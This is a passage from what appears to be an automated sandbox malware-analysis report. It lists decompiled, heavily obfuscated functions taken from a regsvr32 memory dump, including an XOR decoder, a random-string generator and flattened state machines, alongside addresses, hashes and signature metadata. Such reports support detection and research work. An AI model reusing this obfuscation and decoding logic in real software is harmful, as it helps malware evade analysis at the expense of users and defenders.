								_v56 = _v56 ^ 0x00c9ac92;
								_v68 = 0xa5910;
								_v68 = _v68 * 0x6d;
								_v68 = _v68 >> 3;
								_v68 = _v68 + 0xffff4ab9;
								_v68 = _v68 ^ 0x008a3ad4;
								_t100 =  *0x4f8220c; // 0x0
								E04F78EF4(_v48, _v60, _v64, _t103,  *((intOrPtr*)(_t102 + 4)), _v52,  *((intOrPtr*)(_t100 + 0x70)),  &_v36, _v56, _v68, _t103,  *_t102);
								_t114 =  ==  ? 1 : _t114;
							}
						}
						L5:
						return _t114;
					}
					_t90 = 0x7d64a;
					L9:
				} while (_t90 != 0xc3d06);
				goto L5;
			}

0x04f7c234
0x04f7c23b
0x04f7c23f
0x04f7c241
0x04f7c243
0x04f7c247
0x04f7c248
0x04f7c249
0x04f7c24e
0x04f7c251
0x04f7c259
0x04f7c25b
0x04f7c260
0x04f7c269
0x04f7c269
0x04f7c276
0x04f7c382
0x04f7c38c
0x04f7c39b
0x04f7c39c
0x04f7c3a0
0x04f7c3a8
0x04f7c3b0
0x04f7c3b5
0x04f7c3ba
0x04f7c3c2
0x04f7c3ca
0x04f7c3d2
0x04f7c3e0
0x04f7c3e4
0x04f7c3ec
0x04f7c3fc
0x04f7c402
0x04f7c407
0x04f7c40c
0x04f7c412
0x00000000
0x04f7c412
0x04f7c27c
0x04f7c281
0x00000000
0x04f7c287
0x04f7c287
0x04f7c28f
0x04f7c294
0x04f7c29c
0x04f7c2a9
0x04f7c2aa
0x04f7c2ae
0x04f7c2b3
0x04f7c2b8
0x04f7c2c0
0x04f7c2c8
0x04f7c2d5
0x04f7c2d9
0x04f7c2de
0x04f7c2e6
0x04f7c2ee
0x04f7c2f6
0x04f7c2fe
0x04f7c306
0x04f7c30e
0x04f7c316
0x04f7c323
0x04f7c32b
0x04f7c330
0x04f7c338
0x04f7c34c
0x04f7c368
0x04f7c375
0x04f7c375
0x04f7c281
0x04f7c379
0x04f7c381
0x04f7c381
0x04f7c41c
0x04f7c41e
0x04f7c41e
0x00000000

Strings

}-, xrefs: 04F7C3BA
-F., xrefs: 04F7C3A0

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -F.$}-
API String ID: 0-2993735453
Opcode ID: 53ecdf55906d4c13caa7132ad930578067c42689712d1f14980bbc2b2a7c40c4
Instruction ID: b5abd04b10f7aca384525d6432d1ce71ffbba033b6c2cb95ba02fd20ca6dd745
Opcode Fuzzy Hash: 53ecdf55906d4c13caa7132ad930578067c42689712d1f14980bbc2b2a7c40c4
Instruction Fuzzy Hash: 415166B15083429FC758CF64D98981BFBE4FBC8748F004A1EF1A596220D3B9DA19CB93

Uniqueness

Uniqueness Score: -1.00%

Function 04F7BA7C Relevance: 2.6, Strings: 2, Instructions: 111
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E04F7BA7C(void* __ecx, void* __edx) {
				void* _t89;
				signed int _t97;
				unsigned int _t100;
				unsigned int _t101;
				signed int _t111;
				unsigned int _t112;
				char* _t118;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t128;
				char* _t129;
				void* _t130;
				void* _t131;

				_t129 =  *((intOrPtr*)(_t130 + 0x20));
				_t127 =  *(_t130 + 0x28);
				_push(_t127);
				_push(_t129);
				_push( *((intOrPtr*)(_t130 + 0x2c)));
				E04F732C4(_t89);
				 *((intOrPtr*)(_t130 + 0x24)) = 0x4c825;
				asm("stosd");
				_t131 = _t130 + 0x14;
				asm("stosd");
				asm("stosd");
				 *(_t131 + 0x2c) = 0x3a297d;
				_t7 = _t131 + 0x2c; // 0x3a297d
				 *(_t131 + 0x2c) =  *_t7;
				 *(_t131 + 0x2c) =  *(_t131 + 0x2c) ^ 0x003a2979;
				_t11 = _t131 + 0x2c; // 0x3a2979
				_t111 = _t127 /  *_t11;
				if(_t111 != 0) {
					_t126 = _t111;
					do {
						 *(_t131 + 0x28) = 0xf42333;
						 *(_t131 + 0x28) =  *(_t131 + 0x28) + 0xfffffcb6;
						 *(_t131 + 0x28) =  *(_t131 + 0x28) << 2;
						 *(_t131 + 0x28) =  *(_t131 + 0x28) ^ 0xe6501f5c;
						 *(_t131 + 0x28) =  *(_t131 + 0x28) ^ 0xe581f7a3;
						 *(_t131 + 0x2c) = 0xa09531;
						 *(_t131 + 0x2c) =  *(_t131 + 0x2c) * 0x1b;
						 *(_t131 + 0x2c) =  *(_t131 + 0x2c) + 0xffff1376;
						 *(_t131 + 0x2c) =  *(_t131 + 0x2c) | 0x2956b0fb;
						 *(_t131 + 0x2c) =  *(_t131 + 0x2c) ^ 0x39f44a7f;
						 *_t129 = E04F65D2D();
						_t129 = _t129 + 4;
						_t126 = _t126 - 1;
					} while (_t126 != 0);
				}
				 *(_t131 + 0x2c) = 0x32b203;
				 *(_t131 + 0x2c) =  *(_t131 + 0x2c) * 0x6a;
				 *(_t131 + 0x2c) =  *(_t131 + 0x2c) >> 2;
				 *(_t131 + 0x2c) =  *(_t131 + 0x2c) | 0xc785adfa;
				 *(_t131 + 0x2c) =  *(_t131 + 0x2c) ^ 0xc7bfedfb;
				_t97 =  *(_t131 + 0x2c) * _t111;
				_t128 = _t127 - _t97;
				if(_t128 != 0) {
					 *(_t131 + 0x2c) = 0x7e5fd4;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) + 0x1fb0;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) ^ 0xdd55ac1b;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) | 0x3f0a8461;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) ^ 0xff21f11b;
					 *(_t131 + 0x28) = 0x311c0d;
					 *(_t131 + 0x28) =  *(_t131 + 0x28) + 0x4748;
					 *(_t131 + 0x28) =  *(_t131 + 0x28) ^ 0x003dd16f;
					_t100 = E04F65D2D();
					_t112 = _t100;
					_t101 = _t100 >> 0x10;
					 *(_t131 + 0x28) = _t101;
					 *_t129 = _t101 >> 8;
					_t118 = _t129 + 1;
					 *(_t131 + 0x2c) = 0x13ff1d;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) | 0x55be7b55;
					_t125 = 0x4c;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) / _t125;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) + 0xc2b1;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) ^ 0x01219a42;
					if(_t128 >  *(_t131 + 0x2c)) {
						 *_t118 =  *(_t131 + 0x28);
						_t118 = _t118 + 1;
					}
					 *(_t131 + 0x2c) = 0xcc691c;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) * 0x63;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) | 0x1a8b0f80;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) >> 5;
					 *(_t131 + 0x2c) =  *(_t131 + 0x2c) ^ 0x02fc7d7c;
					_t97 =  *(_t131 + 0x2c);
					if(_t128 > _t97) {
						 *_t118 = _t112 >> 8;
						return _t97;
					}
				}
				return _t97;
			}

0x04f7ba81
0x04f7ba86
0x04f7ba8b
0x04f7ba8c
0x04f7ba8d
0x04f7ba93
0x04f7ba98
0x04f7baa8
0x04f7baa9
0x04f7baac
0x04f7baad
0x04f7baae
0x04f7bab6
0x04f7baba
0x04f7bac0
0x04f7bac8
0x04f7bace
0x04f7bad2
0x04f7bad4
0x04f7bad6
0x04f7bad6
0x04f7bade
0x04f7bae6
0x04f7baeb
0x04f7baf3
0x04f7bafb
0x04f7bb08
0x04f7bb0c
0x04f7bb14
0x04f7bb1c
0x04f7bb31
0x04f7bb34
0x04f7bb37
0x04f7bb37
0x04f7bad6
0x04f7bb3a
0x04f7bb47
0x04f7bb4b
0x04f7bb50
0x04f7bb58
0x04f7bb64
0x04f7bb67
0x04f7bb69
0x04f7bb6f
0x04f7bb77
0x04f7bb7f
0x04f7bb87
0x04f7bb8f
0x04f7bb97
0x04f7bb9f
0x04f7bba7
0x04f7bbb7
0x04f7bbbc
0x04f7bbc0
0x04f7bbc5
0x04f7bbcc
0x04f7bbcf
0x04f7bbd2
0x04f7bbda
0x04f7bbe8
0x04f7bbeb
0x04f7bbef
0x04f7bbf7
0x04f7bc05
0x04f7bc0b
0x04f7bc0d
0x04f7bc0d
0x04f7bc0e
0x04f7bc1b
0x04f7bc1f
0x04f7bc27
0x04f7bc2c
0x04f7bc34
0x04f7bc3a
0x04f7bc3f
0x00000000
0x04f7bc3f
0x04f7bc3a
0x04f7bc48

Strings

}):, xrefs: 04F7BAB6
HG, xrefs: 04F7BB9F

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: HG$}):
API String ID: 0-1227434184
Opcode ID: dc5a4466baa2ed6fa08102c89e4a7e911e7edf5d4ddf4c523209f6c053adc030
Instruction ID: e6eb30d46b45251d7370cf76489e2254ef1313259192124ceec67a0675bc83f0
Opcode Fuzzy Hash: dc5a4466baa2ed6fa08102c89e4a7e911e7edf5d4ddf4c523209f6c053adc030
Instruction Fuzzy Hash: 0441C1755083009FD344DF3AC48540BBBE5EBC936CF048A1DF5A9AA260D374E64A8F0A

Uniqueness

Uniqueness Score: -1.00%

Function 04F7D6A7 Relevance: 2.6, Strings: 2, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E04F7D6A7(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int* _t66;
				signed int* _t86;
				signed int* _t87;
				signed int _t89;
				signed int _t91;
				signed int _t94;
				unsigned int _t95;
				unsigned int _t96;
				void* _t104;
				signed int _t106;
				void* _t107;
				unsigned int _t109;
				signed int _t111;
				signed int _t113;
				signed int _t114;
				unsigned int _t118;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				_t66 = E04F732C4(_a8);
				_t89 =  *_t66;
				_t4 =  &(_t66[1]); // 0x4
				_t86 = _t4;
				_v12 = 0xd5814;
				_t106 =  *_t86 ^ _t89;
				_v8 = 0xbe2e;
				_t87 =  &(_t86[1]);
				_v4 = 0x1e1d3;
				_v24 = 0x5074d9;
				_v24 = _v24 >> 3;
				_v24 = _v24 ^ 0x000a0e9a;
				_a8 = 0xa3c8c8;
				_a8 = _a8 >> 6;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 >> 2;
				_a8 = _a8 ^ 0x00000005;
				_v20 = _t89;
				_t91 = _v24 + _t106;
				_t109 = _v24 + _t106;
				_v16 = _t106;
				if((_a8 - 0x00000001 & _t91) != 0) {
					_t109 = (_t109 &  !(_a8 - 1)) + _a8;
					_t118 = _t109;
				}
				_v24 = 0xca7479;
				_push(_t91);
				_v24 = _v24 * 0x33;
				_v24 = _v24 >> 7;
				_v24 = _v24 << 8;
				_v24 = _v24 ^ 0x50a6b359;
				_a8 = 0xd077d8;
				_a8 = _a8 >> 4;
				_a8 = _a8 * 0x23;
				_a8 = _a8 + 0xa5e;
				_a8 = _a8 ^ 0x01ce412a;
				_t113 = E04F73EE6(_t91, _t109 + _t109, _t118);
				_a8 = _t113;
				if(_t113 != 0) {
					_t111 = _t113;
					_t104 =  >  ? 0 :  &(_t87[_t109 >> 2]) - _t87 + 3 >> 2;
					if(_t104 != 0) {
						_t114 = _v20;
						_t107 = 0;
						do {
							_t94 =  *_t87;
							_t87 =  &(_t87[1]);
							_t95 = _t94 ^ _t114;
							 *_t111 = _t95 & 0x000000ff;
							_t111 = _t111 + 8;
							 *((short*)(_t111 - 6)) = _t95 >> 0x00000008 & 0x000000ff;
							_t96 = _t95 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t111 - 4)) = _t96 & 0x000000ff;
							 *((short*)(_t111 - 2)) = _t96 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t104);
						_t106 = _v16;
						_t113 = _a8;
					}
					 *((short*)(_t113 + _t106 * 2)) = 0;
				}
				return _t113;
			}

0x04f7d6b2
0x04f7d6b6
0x04f7d6b7
0x04f7d6bb
0x04f7d6bc
0x04f7d6bd
0x04f7d6c2
0x04f7d6c4
0x04f7d6c4
0x04f7d6cc
0x04f7d6d4
0x04f7d6d6
0x04f7d6de
0x04f7d6e1
0x04f7d6e9
0x04f7d6f1
0x04f7d6f6
0x04f7d6fe
0x04f7d706
0x04f7d70b
0x04f7d710
0x04f7d715
0x04f7d71a
0x04f7d726
0x04f7d72d
0x04f7d72f
0x04f7d735
0x04f7d740
0x04f7d740
0x04f7d740
0x04f7d744
0x04f7d754
0x04f7d755
0x04f7d759
0x04f7d75e
0x04f7d763
0x04f7d76b
0x04f7d773
0x04f7d77d
0x04f7d781
0x04f7d789
0x04f7d79e
0x04f7d7a0
0x04f7d7a7
0x04f7d7b1
0x04f7d7bf
0x04f7d7c4
0x04f7d7c6
0x04f7d7ca
0x04f7d7cc
0x04f7d7cc
0x04f7d7ce
0x04f7d7d1
0x04f7d7d6
0x04f7d7de
0x04f7d7e4
0x04f7d7e8
0x04f7d7f1
0x04f7d7f2
0x04f7d7f9
0x04f7d7fd
0x04f7d801
0x04f7d805
0x04f7d805
0x04f7d80b
0x04f7d80b
0x04f7d819

Strings

CJD, xrefs: 04F7D6AF
^, xrefs: 04F7D781

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ^$CJD
API String ID: 0-1707949639
Opcode ID: 5424ddfccc6b93920a8bfe49418ab07e2b7468b89fe5eee50ad728f41430df2b
Instruction ID: c9139fcc087e744f05586f5214d3e7847c0f37c6ca6b4e18d87d2d6a4cbca66d
Opcode Fuzzy Hash: 5424ddfccc6b93920a8bfe49418ab07e2b7468b89fe5eee50ad728f41430df2b
Instruction Fuzzy Hash: A8415572519346ABC748DF18D98581BF7E0FFD4704F84691EF88597210D7B8E909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04F6A203 Relevance: 2.6, Strings: 2, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E04F6A203(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				signed int _v60;
				void* _t65;
				void* _t67;
				void* _t83;
				signed int _t85;
				intOrPtr _t104;

				_t103 = _a16;
				_t83 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t65);
				_v52 = 0x17078;
				_t104 = 0;
				_v48 = 0x10c35;
				_v44 = 0xa9899;
				_t67 = 0x24a88;
				_v40 = 0;
				while(_t67 != 0x24a88) {
					if(_t67 == 0x51f59) {
						_v60 = 0x974763;
						_t85 = 0x34;
						_v60 = _v60 / _t85;
						_v60 = _v60 * 0x52;
						_v60 = _v60 + 0xff29;
						_v60 = _v60 ^ 0x00e7cdb5;
						_v56 = 0x79b4b3;
						_v56 = _v56 * 0x1d;
						_v56 = _v56 ^ 0x0dcf0db7;
						E04F80484(_v60, _t83,  &_v36, _v56);
						_t67 = 0xd5ad5;
						continue;
					} else {
						if(_t67 == 0x9044b) {
							_v60 = 0x7922e1;
							_v60 = _v60 >> 1;
							_v60 = _v60 ^ 0x00325654;
							_v56 = 0xe4ad24;
							_v56 = _v56 + 0xffff76b6;
							_v56 = _v56 * 0x71;
							_v56 = _v56 ^ 0x64bb434d;
							_t63 =  &_v60; // 0x325654
							__eflags = E04F6D362( *_t63, _v56, __eflags,  &_v36, _t103 + 0x10);
							_t104 =  !=  ? 1 : _t104;
						} else {
							_t112 = _t67 - 0xd5ad5;
							if(_t67 != 0xd5ad5) {
								L9:
								__eflags = _t67 - 0x2ab4e;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_v56 = 0xb275a2;
								_v56 = _v56 + 0xffffc8aa;
								_v56 = _v56 << 2;
								_v56 = _v56 ^ 0x02c65b43;
								_v60 = 0x10d145;
								_v60 = _v60 * 0x57;
								_v60 = _v60 * 0x78;
								_v60 = _v60 >> 1;
								_v60 = _v60 ^ 0x56e44d42;
								if(E04F6D362(_v56, _v60, _t112,  &_v36, _t103) != 0) {
									_t67 = 0x9044b;
									continue;
								}
							}
						}
					}
					return _t104;
				}
				_t67 = 0x51f59;
				goto L9;
			}

0x04f6a20a
0x04f6a20e
0x04f6a210
0x04f6a211
0x04f6a215
0x04f6a219
0x04f6a21d
0x04f6a21e
0x04f6a21f
0x04f6a227
0x04f6a22f
0x04f6a231
0x04f6a239
0x04f6a241
0x04f6a246
0x04f6a24f
0x04f6a25c
0x04f6a2e2
0x04f6a2f2
0x04f6a2f7
0x04f6a300
0x04f6a304
0x04f6a30c
0x04f6a314
0x04f6a321
0x04f6a329
0x04f6a33a
0x04f6a341
0x00000000
0x04f6a262
0x04f6a267
0x04f6a35a
0x04f6a362
0x04f6a366
0x04f6a36e
0x04f6a376
0x04f6a383
0x04f6a38a
0x04f6a396
0x04f6a3aa
0x04f6a3ac
0x04f6a26d
0x04f6a26d
0x04f6a272
0x04f6a34d
0x04f6a34d
0x04f6a352
0x00000000
0x00000000
0x04f6a358
0x04f6a278
0x04f6a278
0x04f6a280
0x04f6a288
0x04f6a28d
0x04f6a295
0x04f6a2a3
0x04f6a2ac
0x04f6a2b4
0x04f6a2b8
0x04f6a2d2
0x04f6a2d8
0x00000000
0x04f6a2d8
0x04f6a2d2
0x04f6a272
0x04f6a267
0x04f6a3b8
0x04f6a3b8
0x04f6a34b
0x00000000

Strings

BMV, xrefs: 04F6A2B8
TV2, xrefs: 04F6A396

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: BMV$TV2
API String ID: 0-2869001384
Opcode ID: 84979d9ad13776689ebdefe6da9b4e98bafbca1d9e871d82d3557445dc764e1b
Instruction ID: 38e73661af2f09a6afa1121c9be7f35e5a9a4ea55ec8651336c4f4b8c8cedd1e
Opcode Fuzzy Hash: 84979d9ad13776689ebdefe6da9b4e98bafbca1d9e871d82d3557445dc764e1b
Instruction Fuzzy Hash: 54412A726083028BC714CF68E94541BFBE9FBC5B14F100D2EF592A6250D7B5EA098BA3

Uniqueness

Uniqueness Score: -1.00%

Function 04F759FA Relevance: 2.6, Strings: 2, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E04F759FA(intOrPtr __ecx, void* __edx) {
				void* _t93;
				signed int _t103;
				short _t110;
				short _t111;
				short _t112;
				signed int _t113;
				intOrPtr _t114;
				signed int _t120;
				intOrPtr _t121;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				void* _t125;
				void* _t126;

				_t114 = __ecx;
				_t113 =  *(_t125 + 0x9c);
				_t120 =  *(_t125 + 0xb4);
				_push(_t120);
				_push( *(_t125 + 0xb4));
				 *((intOrPtr*)(_t125 + 0x24)) = __ecx;
				_push( *(_t125 + 0xb4));
				_push(_t113);
				_push( *(_t125 + 0xb4));
				_push(__ecx);
				E04F732C4(_t93);
				 *((intOrPtr*)(_t125 + 0x30)) = 0xc7695;
				_t124 = 0;
				 *((intOrPtr*)(_t125 + 0x34)) = 0xce89;
				_t126 = _t125 + 0x1c;
				 *(_t126 + 0x10) = 0x56d3d2;
				_t122 = 0;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) * 0x32;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) * 0x6f;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) | 0xfeb7c3f2;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) ^ 0xfef7f3ff;
				if((_t120 &  *(_t126 + 0x10)) != 0) {
					_t112 = 0x61;
					do {
						 *((short*)(_t126 + 0x20 + _t122 * 2)) = _t112;
						_t122 = _t122 + 1;
						_t112 = _t112 + 1;
					} while (_t112 <= 0x7a);
				}
				 *(_t126 + 0x10) = 0x27eb6e;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) ^ 0x443a6183;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) >> 0xd;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) ^ 0x000220ee;
				if((_t120 &  *(_t126 + 0x10)) != 0) {
					_t111 = 0x41;
					do {
						 *((short*)(_t126 + 0x20 + _t122 * 2)) = _t111;
						_t122 = _t122 + 1;
						_t111 = _t111 + 1;
					} while (_t111 <= 0x5a);
				}
				 *(_t126 + 0x10) = 0x67edf8;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) * 0x76;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) << 1;
				 *(_t126 + 0x10) =  *(_t126 + 0x10) ^ 0x5fcf60a4;
				if((_t120 &  *(_t126 + 0x10)) != 0) {
					_t110 = 0x30;
					do {
						 *((short*)(_t126 + 0x20 + _t122 * 2)) = _t110;
						_t122 = _t122 + 1;
						_t110 = _t110 + 1;
					} while (_t110 <= 0x39);
				}
				if(_t113 != 0) {
					_t121 = _t114;
					do {
						 *(_t126 + 0x10) = 0x2eb846;
						 *(_t126 + 0x10) =  *(_t126 + 0x10) >> 6;
						 *(_t126 + 0x10) =  *(_t126 + 0x10) | 0x8af3b027;
						 *(_t126 + 0x10) =  *(_t126 + 0x10) << 0xf;
						 *(_t126 + 0x10) =  *(_t126 + 0x10) ^ 0xdd70cfc6;
						 *(_t126 + 0x14) = 0x38edc0;
						 *(_t126 + 0x14) =  *(_t126 + 0x14) + 0xfffff021;
						 *(_t126 + 0x14) =  *(_t126 + 0x14) >> 8;
						 *(_t126 + 0x14) =  *(_t126 + 0x14) ^ 0x00007ca6;
						 *((short*)(_t121 + _t124 * 2)) =  *((intOrPtr*)(_t126 + 0x20 + E04F65D2D() % _t122 * 2));
						_t124 = _t124 + 1;
					} while (_t124 < _t113);
					_t120 =  *(_t126 + 0xb4);
					_t114 =  *((intOrPtr*)(_t126 + 0x1c));
				}
				 *(_t126 + 0x14) = 0xd4d995;
				_t123 = 0x15;
				 *(_t126 + 0x14) =  *(_t126 + 0x14) / _t123;
				 *(_t126 + 0x14) =  *(_t126 + 0x14) ^ 0x000a22b5;
				_t103 =  *(_t126 + 0x14);
				if((_t120 & _t103) != 0) {
					 *((short*)(_t114 + _t113 * 2)) = 0;
					return 0;
				}
				return _t103;
			}

0x04f759fa
0x04f75a01
0x04f75a0b
0x04f75a12
0x04f75a13
0x04f75a1a
0x04f75a1e
0x04f75a25
0x04f75a26
0x04f75a2e
0x04f75a2f
0x04f75a34
0x04f75a3c
0x04f75a3e
0x04f75a46
0x04f75a49
0x04f75a51
0x04f75a58
0x04f75a61
0x04f75a65
0x04f75a6d
0x04f75a7b
0x04f75a7f
0x04f75a80
0x04f75a80
0x04f75a85
0x04f75a86
0x04f75a87
0x04f75a80
0x04f75a8d
0x04f75a95
0x04f75a9d
0x04f75aa2
0x04f75ab0
0x04f75ab4
0x04f75ab5
0x04f75ab5
0x04f75aba
0x04f75abb
0x04f75abc
0x04f75ab5
0x04f75ac2
0x04f75acf
0x04f75ad3
0x04f75ad7
0x04f75ae5
0x04f75ae9
0x04f75aea
0x04f75aea
0x04f75aef
0x04f75af0
0x04f75af1
0x04f75aea
0x04f75af9
0x04f75afb
0x04f75afd
0x04f75afd
0x04f75b05
0x04f75b0a
0x04f75b12
0x04f75b17
0x04f75b1f
0x04f75b27
0x04f75b2f
0x04f75b34
0x04f75b52
0x04f75b56
0x04f75b57
0x04f75b5b
0x04f75b62
0x04f75b62
0x04f75b66
0x04f75b76
0x04f75b79
0x04f75b7d
0x04f75b85
0x04f75b8b
0x04f75b8f
0x00000000
0x04f75b8f
0x04f75b9d

Strings

=MF;, xrefs: 04F75A08
n', xrefs: 04F75A8D

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: =MF;$n'
API String ID: 0-445430973
Opcode ID: 00728882e49b0fd6ed547cbb09527605c9e53bddb38a28cf261c359b14367954
Instruction ID: 457728c8b40bd76e84e25e252640917197a72ce467073e4dfae93092222b5e4b
Opcode Fuzzy Hash: 00728882e49b0fd6ed547cbb09527605c9e53bddb38a28cf261c359b14367954
Instruction Fuzzy Hash: 394176755083829BC324DF24D54861BBBE1FFC8704F001E2EF5A59A250D3B4E61ACBA7

Uniqueness

Uniqueness Score: -1.00%

Function 04F69BDE Relevance: 2.6, Strings: 2, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E04F69BDE() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				signed int _v340;
				signed int _v344;
				void* _t74;
				signed int _t90;
				void* _t102;

				_v336 = 0x73457;
				_t74 = 0x79f7d;
				_v332 = 0x92e43;
				_t102 = 0;
				_v328 = 0x6e834;
				_v324 = 0xe54e6;
				do {
					while(_t74 != 0x5617) {
						if(_t74 == 0x5eff6) {
							_v340 = 0x87c70d;
							_v340 = _v340 + 0xb25;
							_v340 = _v340 >> 0xa;
							_v340 = _v340 ^ 0x0000221c;
							_t102 = _t102 + _v340 * _v280;
							_t74 = 0x5617;
							continue;
						} else {
							if(_t74 == 0x60148) {
								_t102 = _t102 + (_v320 & 0x0000ffff);
							} else {
								if(_t74 == 0x68e23) {
									_v284 = 0x11c;
									_v344 = 0x56a9bd;
									_v344 = _v344 >> 0xf;
									_t90 = 0x23;
									_v344 = _v344 / _t90;
									_v344 = _v344 << 3;
									_v344 = _v344 ^ 0x000066f0;
									_v340 = 0x153d09;
									_v340 = _v340 + 0x30d3;
									_v340 = _v340 + 0xffffa2b0;
									_v340 = _v340 ^ 0x00168e7a;
									E04F7F4C0(_v344, _v340,  &_v284);
									_t74 = 0xe0a4e;
									continue;
								} else {
									if(_t74 == 0x79f7d) {
										_t74 = 0x68e23;
										continue;
									} else {
										if(_t74 == 0xe0a4e) {
											_v340 = 0xc84df2;
											_v340 = _v340 ^ 0x30cc7d9b;
											_v340 = _v340 ^ 0x3009ca27;
											_v344 = 0x57f5d4;
											_v344 = _v344 * 0x61;
											_v344 = _v344 + 0xffff5b72;
											_v344 = _v344 ^ 0x21587a79;
											_t27 =  &_v344; // 0x21587a79
											E04F76CBC( &_v320, _v340,  *_t27);
											_t74 = 0xfb814;
											continue;
										} else {
											if(_t74 != 0xfb814) {
												goto L14;
											} else {
												_v344 = 0x640f23;
												_v344 = _v344 + 0xffff8c12;
												_v344 = _v344 * 0xa;
												_v344 = _v344 ^ 0x03e596b2;
												_t74 = 0x5eff6;
												_t102 = _t102 + _v344 * (_v2 & 0x000000ff);
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t102;
					}
					_v344 = 0x57c56c;
					_v344 = _v344 << 7;
					_v344 = _v344 >> 0x10;
					_v344 = _v344 + 0xec8a;
					_v344 = _v344 ^ 0x00011808;
					_t102 = _t102 + _v344 * _v276;
					_t74 = 0x60148;
					L14:
				} while (_t74 != 0x540e0);
				goto L17;
			}

0x04f69be6
0x04f69bee
0x04f69bf4
0x04f69bfc
0x04f69bff
0x04f69c0c
0x04f69c1e
0x04f69c1e
0x04f69c2b
0x04f69d61
0x04f69d69
0x04f69d71
0x04f69d76
0x04f69d87
0x04f69d89
0x00000000
0x04f69c31
0x04f69c33
0x04f69dd1
0x04f69c39
0x04f69c3b
0x04f69cf3
0x04f69cfd
0x04f69d05
0x04f69d10
0x04f69d13
0x04f69d1b
0x04f69d20
0x04f69d28
0x04f69d30
0x04f69d38
0x04f69d40
0x04f69d51
0x04f69d57
0x00000000
0x04f69c41
0x04f69c46
0x04f69cec
0x00000000
0x04f69c4c
0x04f69c51
0x04f69c97
0x04f69ca3
0x04f69cab
0x04f69cb3
0x04f69cc0
